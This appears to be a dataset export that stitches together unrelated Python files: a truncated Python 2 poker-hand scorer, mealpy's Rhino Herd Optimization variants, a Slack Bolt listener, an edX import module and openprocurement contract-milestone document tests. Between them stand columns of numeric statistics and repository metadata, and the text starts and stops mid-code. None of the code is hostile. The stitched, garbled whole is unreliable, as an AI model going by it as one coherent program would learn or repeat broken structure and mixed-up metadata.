df3.iloc[i * 4 + k - 1, 14] = 1
elif max(a4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif max(a5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check for one pair
elif TP1+TP2+TP3+TP4+TP5 > 0:
print "One pair"
b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
if max(f1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if max(f2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if max(f3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if max(f4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if max(f5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3])
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
df1.to_csv('P1.csv', index= False)
df2.to_csv('P2.csv', index= False)
df3.to_csv('P3.csv', index= False)
df4.to_csv('P4.csv', index= False)
df5.to_csv('P5.csv', index= False)
| 64.94594
| 152
| 0.261602
| 34,532
| 284,723
| 2.156666
| 0.004691
| 0.057738
| 0.086607
| 0.114671
| 0.987808
| 0.983927
| 0.982276
| 0.980423
| 0.976824
| 0.972984
| 0
| 0.15816
| 0.599593
| 284,723
| 4,383
| 153
| 64.960757
| 0.495092
| 0.017898
| 0
| 0.905628
| 0
| 0
| 0.001808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.000728
| null | null | 0.011402
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f728d9b17682bd804bb3615a11c5e2ce2f618a85
| 11,026
|
py
|
Python
|
mealpy/fake/RHO.py
|
ashishpatel26/mealpy
|
62160e61b8bd4b084e44b80fda720e6bd6332e03
|
[
"MIT"
] | 1
|
2021-05-20T06:53:08.000Z
|
2021-05-20T06:53:08.000Z
|
mealpy/fake/RHO.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | null | null | null |
mealpy/fake/RHO.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | 1
|
2020-09-30T21:14:33.000Z
|
2020-09-30T21:14:33.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 14:53, 17/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, normal
from numpy.linalg import norm
from numpy import exp, power, pi, zeros, array, mean, ones, dot
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class OriginalRHO(Root):
"""
The original version of: Rhino Herd Optimization (RHO)
(A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
Link:
https://doi.org/10.3384/ecp171421026
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
self.epoch = epoch
self.pop_size = pop_size
self.c = c # shape parameter - default = 0.53 > 0
self.a = a # scale parameter - default = 2831 > 0
self.r = r # default = 0.04
self.A = A # the area of each grid cell - default = 1
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
# Epoch loop
for epoch in range(self.epoch):
pos_list = array([item[self.ID_POS] for item in pop])
fit_list = array([item[self.ID_FIT] for item in pop])
fx_list = deepcopy(fit_list)
pos_center = mean(pos_list, axis=0)
## Each individual loop
for i in range(0, self.pop_size):
# Eq. 1
exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c)
fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
fx_list[i] = fx
# Eq. 7
s_component = ones(self.problem_size)
for j in range(0, self.problem_size):
sum_temp = 0
for i in range(0, self.pop_size):
sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS][j] / (self.EPSILON + pop[i][self.ID_FIT]))
s_component[j] = self.A * sum_temp
for i in range(0, self.pop_size):
x_new = pop[i][self.ID_POS]
for j in range(0, self.problem_size):
# Eq. 7
s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS][j]) / s_component[j]
# Eq. 9
if uniform() <= 0.5:
x_new[j] = pop[i][self.ID_POS][j] - uniform() * s_x * pop[i][self.ID_POS][j]
else:
x_new[j] = pop[i][self.ID_POS][j] + uniform() * s_x * pop[i][self.ID_POS][j]
x_new = self.amend_position_faster(x_new)
fit = self.get_fitness_position(x_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [x_new, fit]
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class BaseRHO(Root):
"""
My version of: Rhino Herd Optimization (RHO)
(A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
Notes:
+ Remove third loop
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
self.epoch = epoch
self.pop_size = pop_size
self.c = c # shape parameter - default = 0.53 > 0
self.a = a # scale parameter - default = 2831 > 0
self.r = r # default = 0.04
self.A = A # the area of each grid cell - default = 1
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
pop_size = self.pop_size
# Epoch loop
for epoch in range(self.epoch):
pop_new = deepcopy(pop)
pos_list = array([item[self.ID_POS] for item in pop])
fit_list = array([item[self.ID_FIT] for item in pop])
fx_list = deepcopy(fit_list)
pos_center = mean(pos_list, axis=0)
## Calculate the fx for each individual
for i in range(0, pop_size):
# Eq. 1
exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c )
fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
fx_list[i] = fx
# print(fx_list)
# Eq. 7
sum_temp = zeros(self.problem_size)
for i in range(0, pop_size):
sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] * pop[i][self.ID_FIT])
sum_temp = self.A * sum_temp
for i in range(0, pop_size):
s_x = fx_list[i] * (1 + pop[i][self.ID_POS]/pop[i][self.ID_FIT]) / sum_temp
if uniform() <= 0.5:
x_new = pop[i][self.ID_POS] - uniform() * dot(s_x, pop[i][self.ID_POS])
else:
x_new = pop[i][self.ID_POS] + uniform() * dot(s_x, pop[i][self.ID_POS])
x_new = self.amend_position_faster(x_new)
fit = self.get_fitness_position(x_new)
if fit < pop[i][self.ID_FIT]:
pop_new[i] = [x_new, fit]
if epoch % 100 == 0:
pop_size = self.pop_size
pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT])
pop = deepcopy(pop_new[:pop_size])
else:
pop_size = pop_size + int(self.r * pop_size)
n_new = pop_size - len(pop)
for i in range(0, n_new):
pop_new.extend([self.create_solution()])
pop = deepcopy(pop_new)
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyRHO(BaseRHO):
"""
My modified version of: Rhino Herd Optimization (RH)
(A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
Notes:
+ Change the flow of algorithm
+ Uses normal in equation instead of uniform
+ Uses levy-flight instead of uniform-equation
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
BaseRHO.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size, c, a, r, A)
def train(self):
pop = [self.create_solution(minmax=0) for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
pop_size = self.pop_size
# Epoch loop
for epoch in range(self.epoch):
pop_new = deepcopy(pop)
pos_list = array([item[self.ID_POS] for item in pop])
pos_center = mean(pos_list, axis=0)
fx_list = zeros(pop_size)
## Calculate the fx for each individual
for i in range(0, pop_size):
# Eq. 1
exp_component = -1 * power( norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c )
fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
fx_list[i] = fx
#print(fx_list)
# Eq. 7
sum_temp = zeros(self.problem_size)
for i in range(0, self.pop_size):
sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] / pop[i][self.ID_FIT] + self.EPSILON)
sum_temp = self.A * sum_temp
for i in range(0, pop_size):
s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS]) / sum_temp
if uniform() < 0.5:
x_new = pop[i][self.ID_POS] - normal() * dot(s_x, pop[i][self.ID_POS])
else:
x_new = self.levy_flight(epoch+1, pop[i][self.ID_POS], g_best[self.ID_POS])
x_new = self.amend_position_faster(x_new)
fit = self.get_fitness_position(x_new)
if fit < pop[i][self.ID_FIT]:
pop_new[i] = [x_new, fit]
if epoch % 100 == 0:
pop_size = self.pop_size
pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT])
pop = deepcopy(pop_new[:pop_size])
else:
pop_size = pop_size + int(self.r * pop_size)
n_new = pop_size - len(pop)
for i in range(0, n_new):
pop_new.extend([self.create_solution()])
pop = deepcopy(pop_new)
## Make sure the population does not have duplicates.
new_set = set()
for idx, obj in enumerate(pop):
if tuple(obj[self.ID_POS].tolist()) in new_set:
pop[idx] = self.create_solution()
else:
new_set.add(tuple(obj[self.ID_POS].tolist()))
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("> Epoch: {}, Pop Size: {}, Best Fit: {}".format(epoch+1, pop_size, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| 45.561983
| 112
| 0.519137
| 1,536
| 11,026
| 3.510417
| 0.122396
| 0.067878
| 0.050074
| 0.055638
| 0.840134
| 0.827337
| 0.815467
| 0.798776
| 0.777634
| 0.773182
| 0
| 0.026794
| 0.346726
| 11,026
| 241
| 113
| 45.751037
| 0.721783
| 0.166969
| 0
| 0.773585
| 0
| 0
| 0.009826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.037736
| 0
| 0.113208
| 0.018868
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f775432b4d5e6b1a33ee0c6ecc7e1e44e84cf48b
| 172
|
py
|
Python
|
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | 1
|
2022-03-29T16:13:25.000Z
|
2022-03-29T16:13:25.000Z
|
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | null | null | null |
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | null | null | null |
from slack_bolt import App
from .sample_shortcut import sample_shortcut_callback
def register(app: App):
app.shortcut("sample_shortcut_id")(sample_shortcut_callback)
| 24.571429
| 64
| 0.825581
| 24
| 172
| 5.583333
| 0.458333
| 0.41791
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 172
| 6
| 65
| 28.666667
| 0.87013
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3b92109278e3bea2d7ca3c6042720c5370a69f4
| 173
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Aggregate all views exposed by the certificates app.
"""
from lms.djangoapps.certificates.views.support import *
from lms.djangoapps.certificates.views.webview import *
| 28.833333
| 55
| 0.797688
| 22
| 173
| 6.272727
| 0.636364
| 0.101449
| 0.246377
| 0.42029
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104046
| 173
| 5
| 56
| 34.6
| 0.890323
| 0.300578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3bb5249ab3051d55799197bde277a72fb8a652b
| 23,087
|
py
|
Python
|
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | 24
|
2018-04-11T08:56:15.000Z
|
2018-06-13T11:38:34.000Z
|
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | 3
|
2017-05-25T10:15:04.000Z
|
2018-03-27T05:35:29.000Z
|
# -*- coding: utf-8 -*-
from email.header import Header
from openprocurement.api.utils import get_now
# ContractDocumentResourceTest
def contract_milestone_document(self):
response = self.app.patch_json('/contracts/{}?acc_token={}'.format(
self.contract_id, self.contract_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
# load document to contract
response = self.app.post('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), upload_files=[('file', str(Header(u'укр.doc', 'utf-8')), 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
self.assertEqual(u'укр.doc', response.json["data"]["title"])
self.assertEqual(response.json["data"]["documentOf"], "contract")
self.assertNotIn("documentType", response.json["data"])
# try to make it milestone's document
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {"documentOf": "milestone"}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "relatedItem", "description": ["This field is required."]}])
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": '1234' * 8}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "relatedItem", "description": ["relatedItem should be one of milestones"]}])
# get correct milestone id
response = self.app.get('/contracts/{}'.format(self.contract_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
milestone = response.json['data']['milestones'][0]
# make sure it's pending milestone!
self.assertEqual(milestone['status'], 'pending')
# loading documents to pending milestone is allowed
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": milestone['id']}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertEqual(response.json["data"]["documentOf"], 'milestone')
self.assertEqual(response.json["data"]["relatedItem"], milestone['id'])
# update docs for pending milestone is allowed
response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token),
upload_files=[('file', 'name name.doc', 'content2')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertNotIn('name name.doc', response.json["data"]["documentOf"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
# save this document id for later tests
milestone_doc_id = doc_id
# set milestone's status to terminal - met for example
response = self.app.patch_json('/contracts/{}/milestones/{}?acc_token={}'.format(
self.contract_id, milestone['id'], self.contract_token), {'data': {
"status": "met",
"amountPaid": {"amount": 600000}}})
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'met')
self.assertEqual(response.json['data']['amountPaid']['amount'], 600000)
# can't load documents for milestone in met status
response = self.app.post('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), upload_files=[('file', str(Header(u'next.doc', 'utf-8')), 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
self.assertEqual(u'next.doc', response.json["data"]["title"])
self.assertEqual(response.json["data"]["documentOf"], "contract")
self.assertNotIn("documentType", response.json["data"])
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't add document in current (met) milestone status"}])
# update doc (which was loaded earlier) of met milestone is forbidden
response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, milestone_doc_id, self.contract_token),
upload_files=[('file', 'name name.doc', 'content2')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't update document in current (met) milestone status"}])
# get scheduled milestone - it's third one (1 - met, 2 - pending, 3 - scheduled)
response = self.app.get('/contracts/{}'.format(self.contract_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
scheduled_milestone = response.json['data']['milestones'][3]
# make sure it's scheduled milestone!
self.assertEqual(scheduled_milestone['status'], 'scheduled')
# can't load documents for milestone in scheduled status w/o pending change
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": scheduled_milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data",
"description": "Can't add document to scheduled milestone without pending change"}])
# create pending change
response = self.app.post_json('/contracts/{}/changes?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'rationale': u'причина зміни укр',
'rationale_en': 'change cause en',
'rationaleTypes': ['itemPriceVariation']}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['status'], 'pending')
change = response.json['data']
# now loading docs for scheduled milestone is allowed
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": scheduled_milestone['id']}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertEqual(response.json["data"]["documentOf"], 'milestone')
self.assertEqual(response.json["data"]["relatedItem"], scheduled_milestone['id'])
# update docs for scheduled milestone with pending change is allowed
response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token),
upload_files=[('file', 'name name name.doc', 'content2')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertNotIn('name name name.doc', response.json["data"]["documentOf"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
# activate change
response = self.app.patch_json('/contracts/{}/changes/{}?acc_token={}'.format(
self.contract_id, change['id'], self.contract_token), {'data': {
'status': 'active',
'dateSigned': get_now().isoformat()}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
# update docs for scheduled milestone is not allowed without pending change
response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token),
upload_files=[('file', 'name name name.doc', 'content2')], status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data",
"description": "Can't update document to scheduled milestone without pending change"}])
# can't load documents to spare milestone
spare_milestone = self.initial_data['milestones'][-2]
self.assertEqual(spare_milestone['status'], 'spare')
response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {"data": {
"documentOf": "milestone",
"relatedItem": spare_milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't add document in current (spare) milestone status"}])
def milestone_document_json(self):
# load document to "some id" milestone
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'укр.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': '1234' * 8}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "relatedItem", "description": ["relatedItem should be one of milestones"]}])
# get correct milestone id
response = self.app.get('/contracts/{}'.format(self.contract_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
milestone = response.json['data']['milestones'][0]
# make sure it's pending milestone!
self.assertEqual(milestone['status'], 'pending')
# load docs to pending milestone is allowed
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'укр.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': milestone['id']}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
self.assertEqual(u'укр.doc', response.json["data"]["title"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
self.assertIn('Signature=', response.json["data"]["url"])
self.assertIn('KeyID=', response.json["data"]["url"])
self.assertNotIn('Expires=', response.json["data"]["url"])
key = response.json["data"]["url"].split('/')[-1].split('?')[0]
contract = self.db.get(self.contract_id)
self.assertIn(key, contract['documents'][-1]["url"])
self.assertIn('Signature=', contract['documents'][-1]["url"])
self.assertIn('KeyID=', contract['documents'][-1]["url"])
self.assertNotIn('Expires=', contract['documents'][-1]["url"])
response = self.app.get('/contracts/{}/documents/{}'.format(
self.contract_id, doc_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertEqual(u'укр.doc', response.json["data"]["title"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
# update of docs of pending milestone is allowed
response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {'data': {
'title': u'name.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword', }})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertIn('Signature=', response.json["data"]["url"])
self.assertIn('KeyID=', response.json["data"]["url"])
self.assertNotIn('Expires=', response.json["data"]["url"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
# set milestone's status to terminal - met for example
response = self.app.patch_json('/contracts/{}/milestones/{}?acc_token={}'.format(
self.contract_id, milestone['id'], self.contract_token), {'data': {
"status": "met",
"amountPaid": {"amount": 600000}}})
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'met')
self.assertEqual(response.json['data']['amountPaid']['amount'], 600000)
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'name name.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't add document in current (met) milestone status"}])
# update of docs of met milestone is not allowed
response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {'data': {
'title': u'name.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't update document in current (met) milestone status"}])
# get scheduled milestone - it's third one (1 - met, 2 - pending, 3 - scheduled)
response = self.app.get('/contracts/{}'.format(self.contract_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
scheduled_milestone = response.json['data']['milestones'][3]
# make sure it's scheduled milestone!
self.assertEqual(scheduled_milestone['status'], 'scheduled')
# can't load documents for milestone in scheduled status w/o pending change
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'укр.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': scheduled_milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
